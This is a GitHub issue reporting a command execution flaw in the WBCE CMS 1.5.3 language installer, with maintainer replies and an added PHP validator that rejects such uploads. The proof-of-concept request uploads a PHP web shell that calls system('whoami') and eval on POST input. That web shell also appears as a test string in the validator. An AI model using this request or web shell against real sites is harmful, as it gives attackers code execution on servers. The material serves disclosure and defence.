WBCE / WBCE_CMS

Core package of WBCE CMS. This package includes the core and the default addons. Visit https://wbce.org (DE) or https://wbce-cms.org (EN) to learn more or to join the WBCE CMS community.
https://wbce-cms.org
GNU General Public License v2.0

Command execution vulnerability exists in WBCE CMS V1.5.3 background #544

Closed secflag closed 3 months ago

secflag commented 1 year ago

Vulnerability description

There is a command execution vulnerability in the background of WBCE CMS V1.5.3. Vulnerability URL: /admin/languages/install.php. Parameter filtering in the Install Language module is not strict, so there is a command execution vulnerability.

Vulnerability analysis

In the receiving method on line 47 of the file /admin/languages/install.php, the system first saves the data submitted by the client to a temporary file, and then executes the relevant code to trigger the command execution vulnerability.


Vulnerability verification process

POST /admin/languages/install.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Referer: http://localhost/admin/languages/index.php
Cookie: phpsessid-5239-sid=hhh85m1as94tpdkq36vnjcommm; WBCELastConnectJS=1664417056; stElem___stickySidebarElement=%5Bid%3A0%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A1%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A2%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A3%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A4%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A5%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A6%5D%5Bvalue%3AnoClass%5D%23
Connection: close
Content-Type: multipart/form-data; boundary=---------------------------7377265762079
Content-Length: 496

-----------------------------7377265762079
Content-Disposition: form-data; name="formtoken"

67491209-95651bfdf4022592df7062726ca433cbba088a8b
-----------------------------7377265762079
Content-Disposition: form-data; name

Content-Type: application/octet-stream

<?php echo(system('whoami'));@eval($_POST[stcs]);?>
-----------------------------7377265762079
Content-Disposition: form-data; name="submit"

-----------------------------7377265762079--


instantflorian commented 1 year ago

Thanks for reporting. The vulnerability is only accessible if a malicious user a) has backend access and b) is allowed to install languages. Fixing the issue would mean applying conceptual changes to the whole language management, so actually it is the responsibility of the site administrator to grant access only to trustworthy users and only to the areas they really need (e.g. editing contents but not installing modules, languages etc.). Nevertheless, we will take this into consideration for a later version.

instantflorian commented 3 months ago

fixed with https://github.com/WBCE/WBCE_CMS/commit/e4349444136ea0deb835ab8787a59e53b99d63ad
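
The report above describes the uploaded data being saved to a temporary file and then executed. The following is an added example, not WBCE code and not the change in the linked commit, of inspecting such an upload with the PHP tokenizer instead of running it. It assumes language files can be restricted to plain literal assignments; the variable names in the allowlist and the function name `language_file_is_declarative` are hypothetical.

```php
<?php
declare(strict_types=1);

// Added example, not WBCE code. Accepts an uploaded language file only when it
// is a flat list of literal assignments to allowlisted variables. The upload is
// tokenised and inspected; it is never passed to include, require or eval.
function language_file_is_declarative(string $source, array $allowedVars): bool
{
    $okTokens = [T_WHITESPACE, T_COMMENT, T_DOC_COMMENT,
                 T_CONSTANT_ENCAPSED_STRING, T_LNUMBER, T_DOUBLE_ARROW];
    // No '(' here, so no call can appear, direct or through a variable.
    $okChars = ['=', ';', '[', ']', ','];

    $tokens = token_get_all($source);
    if ($tokens === [] || !is_array($tokens[0]) || $tokens[0][0] !== T_OPEN_TAG) {
        return false; // must begin with a PHP open tag, nothing before it
    }
    foreach (array_slice($tokens, 1) as $tok) {
        if (is_string($tok)) {                 // single-character token
            if (!in_array($tok, $okChars, true)) {
                return false;
            }
        } elseif ($tok[0] === T_VARIABLE) {    // only known language variables
            if (!in_array($tok[1], $allowedVars, true)) {
                return false;
            }
        } elseif (!in_array($tok[0], $okTokens, true)) {
            return false; // echo, function names, eval, inline HTML, a second open tag
        }
    }
    return true;
}

// Assumed variable names, for illustration only.
$allowed = ['$language_code', '$language_name', '$TEXT'];

// Constructed benign upload.
$benign = "<?php\n\$language_code = 'EN';\n\$language_name = 'English';\n"
        . "\$TEXT['YES'] = 'Yes';\n";
// File content taken from the request in the report above.
$reported = "<?php echo(system('whoami'));@eval(\$_POST[stcs]);?>";

var_dump(language_file_is_declarative($benign, $allowed));
var_dump(language_file_is_declarative($reported, $allowed));
```

The check is deliberately strict: string concatenation, constants and a closing tag are rejected as well, so language files that use them would need to be simplified before they pass.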